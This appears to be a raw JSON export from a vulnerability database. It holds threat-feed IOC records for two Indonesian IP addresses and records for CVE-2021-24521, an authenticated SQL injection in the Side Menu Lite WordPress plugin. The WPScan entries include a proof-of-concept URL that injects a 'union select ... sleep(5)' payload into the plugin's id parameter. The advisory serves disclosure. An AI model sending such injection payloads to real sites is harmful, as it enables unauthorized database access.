"d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "9d3d40f68bf7c974de0d9c7b8bd74615"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "68f8d8a5c9ffcec816fa28b88ad3e5b89a8e068147bc97dafeb0694cc7069789", "viewCount": 0, "enchantments": {}, "objectVersion": "1.5", "iocType": "ip", "ip": ["119.82.241.66"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.11, "ioc_src": 55.03, "ioc_tags": 0.8, "ioc_total": 4.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "Surabaya", "country": "Indonesia", "region": "East Java"}, "asn": {"cloud": "", "domains": 149, "firstip": {"netv4": "119.82.240.0", "num": "2001924096"}, "isp": "DATAUTAMANETASID", "lastip": {"netv4": "119.82.247.255", "num": "2001926143"}, "num": 24521, "org": "PT DATA Utama Dinamika"}, "immutableFields": [], "threat": []}, {"id": "RST:FCC09982-ED78-33B8-B358-95F1266DB809", "bulletinFamily": "ioc", "title": "RST Threat feed. IOC: 112.109.20.13", "description": "Found **112[.]109.20.13** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **16**.\n First seen: 2021-03-13T03:00:00, Last seen: 2021-05-28T03:00:00.\n IOC tags: **generic**.\nASN 24521: (First IP 112.109.18.0, Last IP 112.109.22.255).\nASN Name \"DATAUTAMANETASID\" and Organisation \"PT DATA Utama Dinamika\".\nASN hosts 146 domains.\nGEO IP information: City \"\", Country \"Indonesia\".\n[https://rstcloud.net/](https://rstcloud.net/)", "published": "2021-05-29T00:00:00", "modified": "2021-03-13T00:00:00", "cvss": {}, "href": "", "reporter": "RST Threat Feed", "references": [], "cvelist": [], "type": "rst", "lastseen": "2021-05-28T00:00:00", "history": [], "edition": 1, "hashmap": [{"key": "asn", "hash": "4a7278350651cd042a633b5171fbff95"}, {"key": "bulletinFamily", "hash": "e03daa7651c34372b0bf8c442bb00813"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "description", "hash": "4aea6aecca848ef46472c547ab7e1494"}, {"key": "domain", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "fp", "hash": "c923ad45656a014eb21907f615f1e97f"}, {"key": "geodata", "hash": "8e15ecbd0004850e51f5b34845b302f9"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "iocScore", "hash": "4d67c5e900c27483fa65916818f623b4"}, {"key": "iocType", "hash": "957b527bcfbad2e80f58d20683931435"}, {"key": "ip", "hash": "9d658eace45ea4fd8dfab8ff1681dba9"}, {"key": "modified", "hash": "d8c261002ea185ce7e3f4fc592e2f742"}, {"key": "published", "hash": "f2635fd9a4cb93b7c5ec268990911a52"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ecfdd35b9632d35ab17dbe9c46491f14"}, {"key": "tags", "hash": "db34099e531f5ecc1dd7c5e13c35811a"}, {"key": "threat", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "4588a4407f74b258ec358d326e2ea97d"}, {"key": "type", "hash": "d674dfcd8b4db6762bcb3667316d3bb9"}, {"key": "url", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "whois", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "ac6e276b69062f6f0ba5a2df44cd4bb4f7bf89353688345b2a26729a0206542d", "viewCount": 0, "enchantments": {}, "objectVersion": "1.5", "iocType": "ip", "ip": ["112.109.20.13"], "domain": [], "url": [], "iocScore": {"ioc_frequency": 0.36, "ioc_src": 55.56, "ioc_tags": 0.8, "ioc_total": 16.0}, "tags": ["generic"], "fp": {"alarm": "false", "descr": ""}, "whois": {}, "geodata": {"city": "", "country": "Indonesia", "region": ""}, "asn": {"cloud": "", "domains": 146, "firstip": {"netv4": "112.109.18.0", "num": "1886196224"}, "isp": "DATAUTAMANETASID", "lastip": {"netv4": "112.109.22.255", "num": "1886197503"}, "num": 24521, "org": "PT DATA Utama Dinamika"}, "threat": [], "immutableFields": []}], "cve": [{"id": "CVE-2021-24521", "bulletinFamily": "NVD", "title": "CVE-2021-24521", "description": "The Side Menu Lite \u00e2\u20ac\u201c add sticky fixed buttons WordPress plugin before 2.2.1 does not properly sanitize input values from the browser when building an SQL statement. Users with the administrator role or permission to manage this plugin could perform an SQL Injection attack.", "published": "2021-08-09T10:15:00", "modified": "2021-08-17T16:35:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24521", "reporter": "contact@wpscan.com", "references": ["https://wpscan.com/vulnerability/eb21ebc5-265c-4378-b2c6-62f6bc2f69cd", "https://github.com/pang0lin/CVEproject/blob/main/wordpress_side-menu-lite_sqli.md"], "cvelist": ["CVE-2021-24521"], "immutableFields": [], "type": "cve", "lastseen": "2021-08-18T19:54:26", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-24521"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": ["CWE-89"], "description": "The Side Menu Lite \u00e2\u20ac\u201c add sticky fixed buttons WordPress plugin before 2.2.1 does not properly sanitize input values from the browser when building an SQL statement. Users with the administrator role or permission to manage this plugin could perform an SQL Injection attack.", "edition": 2, "enchantments": {"dependencies": {"modified": "2021-08-14T08:04:52", "references": [{"idList": ["WPVDB-ID:EB21EBC5-265C-4378-B2C6-62F6BC2F69CD"], "type": "wpvulndb"}, {"idList": ["WPEX-ID:EB21EBC5-265C-4378-B2C6-62F6BC2F69CD"], "type": "wpexploit"}], "rev": 2}, "score": {"modified": "2021-08-14T08:04:52", "rev": 2, "value": 4.3, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-08-10T07:53:51", "tweets": [{"link": "https://twitter.com/threatmeter/status/1425021431289716736", "text": "CVE-2021-24521 The Side Menu Lite \u00e2\u20ac\u201c add sticky fixed buttons WordPress plugin before 2.2.1 does not properly sanitize input values from the browser when building an SQL statement. Users with the administrator role or permission to manage this plugi\u2026 https://t.co/lqYK5c68EQ?amp=1"}, {"link": "https://twitter.com/threatmeter/status/1425021431289716736", "text": "CVE-2021-24521 The Side Menu Lite \u00e2\u20ac\u201c add sticky fixed buttons WordPress plugin before 2.2.1 does not properly sanitize input values from the browser when building an SQL statement. Users with the administrator role or permission to manage this plugi\u2026 https://t.co/lqYK5c68EQ?amp=1"}]}}, "extraReferences": [{"name": "https://github.com/pang0lin/CVEproject/blob/main/wordpress_side-menu-lite_sqli.md", "refsource": "MISC", "tags": [], "url": "https://github.com/pang0lin/CVEproject/blob/main/wordpress_side-menu-lite_sqli.md"}, {"name": "https://wpscan.com/vulnerability/eb21ebc5-265c-4378-b2c6-62f6bc2f69cd", "refsource": "MISC", "tags": [], "url": "https://wpscan.com/vulnerability/eb21ebc5-265c-4378-b2c6-62f6bc2f69cd"}], "hash": "c85b372c6f02a1a5504f5612ee3d52ed83006ef734973c3ceafe6a0be9203556", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "533af5b4ddce30663bd3b20867a0bc49", "key": "reporter"}, {"hash": "2b9dd594e550817ec0582ef0209b3e4a", "key": "title"}, {"hash": "4c0ed7aa44528a0cad501c44ffdbba68", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "eb94ca92eb3cb9a511b0ca02238acd2a", "key": "modified"}, {"hash": "633ddd123e07966c522a6ca9eb18e145", "key": "cvelist"}, {"hash": "87f3571a7cb820a874446e016d3417c5", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "935b1be7ce5095184af479ab7270ac25", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d18814809ef844074a9fb1897cbd36a1", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "4994f73f97fee1825d38aac7bee9aefe", "key": "cwe"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "c8d6efedccbb2a49d9e6e5828a5f6274", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24521", "id": "CVE-2021-24521", "immutableFields": [], "lastseen": "2021-08-14T08:04:52", "modified": "2021-08-09T11:39:00", "objectVersion": "1.6", "published": "2021-08-09T10:15:00", "references": ["https://wpscan.com/vulnerability/eb21ebc5-265c-4378-b2c6-62f6bc2f69cd", "https://github.com/pang0lin/CVEproject/blob/main/wordpress_side-menu-lite_sqli.md"], "reporter": "contact@wpscan.com", "title": "CVE-2021-24521", "type": "cve", "viewCount": 4}, "different_elements": ["extraReferences", "cvss", "modified", "affectedSoftware", "cpeConfiguration"], "edition": 2, "lastseen": "2021-08-14T08:04:52"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "cvelist": ["CVE-2021-24521"], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "cwe": [], "description": "The Side Menu Lite \u00e2\u20ac\u201c add sticky fixed buttons WordPress plugin before 2.2.1 does not properly sanitize input values from the browser when building an SQL statement. Users with the administrator role or permission to manage this plugin could perform an SQL Injection attack.", "edition": 1, "enchantments": {"dependencies": {"modified": "2021-08-10T07:53:51", "references": [{"idList": ["WPVDB-ID:EB21EBC5-265C-4378-B2C6-62F6BC2F69CD"], "type": "wpvulndb"}, {"idList": ["WPEX-ID:EB21EBC5-265C-4378-B2C6-62F6BC2F69CD"], "type": "wpexploit"}], "rev": 2}, "score": {"modified": "2021-08-10T07:53:51", "rev": 2, "value": 4.3, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-08-10T07:53:51", "tweets": [{"link": "https://twitter.com/threatmeter/status/1425021431289716736", "text": "CVE-2021-24521 The Side Menu Lite \u00e2\u20ac\u201c add sticky fixed buttons WordPress plugin before 2.2.1 does not properly sanitize input values from the browser when building an SQL statement. Users with the administrator role or permission to manage this plugi\u2026 https://t.co/lqYK5c68EQ?amp=1"}, {"link": "https://twitter.com/threatmeter/status/1425021431289716736", "text": "CVE-2021-24521 The Side Menu Lite \u00e2\u20ac\u201c add sticky fixed buttons WordPress plugin before 2.2.1 does not properly sanitize input values from the browser when building an SQL statement. Users with the administrator role or permission to manage this plugi\u2026 https://t.co/lqYK5c68EQ?amp=1"}]}}, "extraReferences": [{"name": "https://github.com/pang0lin/CVEproject/blob/main/wordpress_side-menu-lite_sqli.md", "refsource": "MISC", "tags": [], "url": "https://github.com/pang0lin/CVEproject/blob/main/wordpress_side-menu-lite_sqli.md"}, {"name": "https://wpscan.com/vulnerability/eb21ebc5-265c-4378-b2c6-62f6bc2f69cd", "refsource": "MISC", "tags": [], "url": "https://wpscan.com/vulnerability/eb21ebc5-265c-4378-b2c6-62f6bc2f69cd"}], "hash": "8f6fd414ce0e3d0f86998874c0e788172a2ef50978f56f3b98409b11770739c8", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "533af5b4ddce30663bd3b20867a0bc49", "key": "reporter"}, {"hash": "2b9dd594e550817ec0582ef0209b3e4a", "key": "title"}, {"hash": "4c0ed7aa44528a0cad501c44ffdbba68", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "eb94ca92eb3cb9a511b0ca02238acd2a", "key": "modified"}, {"hash": "633ddd123e07966c522a6ca9eb18e145", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cwe"}, {"hash": "87f3571a7cb820a874446e016d3417c5", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedSoftware"}, {"hash": "935b1be7ce5095184af479ab7270ac25", "key": "extraReferences"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d18814809ef844074a9fb1897cbd36a1", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "81342635da437da3b0897e10f103e0d6", "key": "cpeConfiguration"}, {"hash": "c8d6efedccbb2a49d9e6e5828a5f6274", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24521", "id": "CVE-2021-24521", "immutableFields": [], "lastseen": "2021-08-10T07:53:51", "modified": "2021-08-09T11:39:00", "objectVersion": "1.6", "published": "2021-08-09T10:15:00", "references": ["https://wpscan.com/vulnerability/eb21ebc5-265c-4378-b2c6-62f6bc2f69cd", "https://github.com/pang0lin/CVEproject/blob/main/wordpress_side-menu-lite_sqli.md"], "reporter": "contact@wpscan.com", "title": "CVE-2021-24521", "type": "cve", "viewCount": 3}, "different_elements": ["cwe"], "edition": 1, "lastseen": "2021-08-10T07:53:51"}], "edition": 3, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "ea263807f7cb9b843a77a3c1c1460ac4"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "6bfa42264008e5e8060e31222642c6c7"}, {"key": "cvelist", "hash": "633ddd123e07966c522a6ca9eb18e145"}, {"key": "cvss", "hash": "0187fd86f792b6c1e0077d0f69d0ed79"}, {"key": "cvss2", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "4994f73f97fee1825d38aac7bee9aefe"}, {"key": "description", "hash": "c8d6efedccbb2a49d9e6e5828a5f6274"}, {"key": "extraReferences", "hash": "46a1a27905972d8ad7d89cce2a1666b5"}, {"key": "href", "hash": "4c0ed7aa44528a0cad501c44ffdbba68"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "9d64ae7c289e627d241e73d82167ef91"}, {"key": "published", "hash": "87f3571a7cb820a874446e016d3417c5"}, {"key": "references", "hash": "d18814809ef844074a9fb1897cbd36a1"}, {"key": "reporter", "hash": "533af5b4ddce30663bd3b20867a0bc49"}, {"key": "title", "hash": "2b9dd594e550817ec0582ef0209b3e4a"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "50fafcbd7eaa66b903f7382de4a5d138addbef138c96a20ac97a77ff5e0eda49", "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "wpexploit", "idList": ["WPEX-ID:EB21EBC5-265C-4378-B2C6-62F6BC2F69CD"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:EB21EBC5-265C-4378-B2C6-62F6BC2F69CD"]}], "modified": "2021-08-18T19:54:26", "rev": 2}, "score": {"value": 4.3, "vector": "NONE", "modified": "2021-08-18T19:54:26", "rev": 2}, "twitter": {"counter": 2, "modified": "2021-08-10T07:53:51", "tweets": [{"link": "https://twitter.com/threatmeter/status/1425021431289716736", "text": "CVE-2021-24521 The Side Menu Lite \u00e2\u20ac\u201c add sticky fixed buttons WordPress plugin before 2.2.1 does not properly sanitize input values from the browser when building an SQL statement. Users with the administrator role or permission to manage this plugi\u2026 https://t.co/lqYK5c68EQ?amp=1"}, {"link": "https://twitter.com/threatmeter/status/1425021431289716736", "text": "CVE-2021-24521 The Side Menu Lite \u00e2\u20ac\u201c add sticky fixed buttons WordPress plugin before 2.2.1 does not properly sanitize input values from the browser when building an SQL statement. Users with the administrator role or permission to manage this plugi\u2026 https://t.co/lqYK5c68EQ?amp=1"}]}}, "objectVersion": "1.6", "cpe": [], "affectedSoftware": [{"cpeName": "wow-estore:side_menu", "name": "wow-estore side menu", "operator": "lt", "version": "2.2.1"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:wow-estore:side_menu:2.2.1:*:*:*:lite:wordpress:*:*", "cpe_name": [], "versionEndExcluding": "2.2.1", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://wpscan.com/vulnerability/eb21ebc5-265c-4378-b2c6-62f6bc2f69cd", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://wpscan.com/vulnerability/eb21ebc5-265c-4378-b2c6-62f6bc2f69cd"}, {"name": "https://github.com/pang0lin/CVEproject/blob/main/wordpress_side-menu-lite_sqli.md", "refsource": "MISC", "tags": ["Third Party Advisory", "Exploit"], "url": "https://github.com/pang0lin/CVEproject/blob/main/wordpress_side-menu-lite_sqli.md"}], "cpe23": [], "cwe": ["CWE-89"], "scheme": null}], "wpexploit": [{"id": "WPEX-ID:EB21EBC5-265C-4378-B2C6-62F6BC2F69CD", "hash": "61bf8e2c028aad2b5d5315035035434e", "type": "wpexploit", "bulletinFamily": "exploit", "title": "Side Menu Lite < 2.2.1 - Authenticated SQL Injection", "description": "The plugin does not properly sanitize input values from the browser when building an SQL statement. Users with the administrator role or permission to manage this plugin could perform an SQL Injection attack.\n", "published": "2021-06-28T00:00:00", "modified": "2021-07-12T18:42:05", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "pang0lin @webray.com.cn inc", "references": ["https://github.com/pang0lin/CVEproject/blob/main/wordpress_side-menu-lite_sqli.md"], "cvelist": ["CVE-2021-24521"], "immutableFields": [], "lastseen": "2021-09-14T23:36:17", "history": [], "viewCount": 42, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24521"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:EB21EBC5-265C-4378-B2C6-62F6BC2F69CD"]}], "modified": "2021-09-14T23:36:17", "rev": 2}, "score": {"value": 5.1, "vector": "NONE", "modified": "2021-09-14T23:36:17", "rev": 2}}, "objectVersion": "1.6", "sourceData": "http://www.example.com/wp-admin/admin.php?page=side-menu-lite&tab=add-new&act=duplicate&id=0 union select 1,2,sleep(5)\r\n\r\nVisiting the page will be delayed by 5 seconds, due to the sleep(5) injected in to the SQL query.", "generation": 0, "_object_type": "robots.models.wpvulndb.WPExploitBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.wpvulndb.WPExploitBulletin"]}], "wpvulndb": [{"id": "WPVDB-ID:EB21EBC5-265C-4378-B2C6-62F6BC2F69CD", "hash": "48e6ceae2b1b22092683595f6c171d13", "type": "wpvulndb", "bulletinFamily": "software", "title": "Side Menu Lite < 2.2.1 - Authenticated SQL Injection", "description": "The plugin does not properly sanitize input values from the browser when building an SQL statement. Users with the administrator role or permission to manage this plugin could perform an SQL Injection attack.\n\n### PoC\n\nhttp://www.example.com/wp-admin/admin.php?page=side-menu-lite&tab;=add-new&act;=duplicate&id;=0 union select 1,2,sleep(5) Visiting the page will be delayed by 5 seconds, due to the sleep(5) injected in to the SQL query.\n", "published": "2021-06-28T00:00:00", "modified": "2021-07-12T18:42:05", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://wpscan.com/vulnerability/eb21ebc5-265c-4378-b2c6-62f6bc2f69cd", "reporter": "pang0lin @webray.com.cn inc", "references": ["https://github.com/pang0lin/CVEproject/blob/main/wordpress_side-menu-lite_sqli.md"], "cvelist": ["CVE-2021-24521"], "immutableFields": [], "lastseen": "2021-09-14T23:36:17", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24521"]}, {"type": "wpexploit", "idList": ["WPEX-ID:EB21EBC5-265C-4378-B2C6-62F6BC2F69CD"]}], "modified": "2021-09-14T23:36:17", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-09-14T23:36:17", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "2.2.1", "operator": "lt", "name": "side-menu-lite"}], "exploit": "http://www.example.com/wp-admin/admin.php?page=side-menu-lite&tab=add-new&act=duplicate&id=0 union select 1,2,sleep(5)\r\n\r\nVisiting the page will be delayed by 5 seconds, due to the sleep(5) injected in to the SQL query.", "sourceData": "", "generation": 0, "_object_type": "robots.models.wpvulndb.WPVulnDBBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.wpvulndb.WPVulnDBBulletin"]}]}
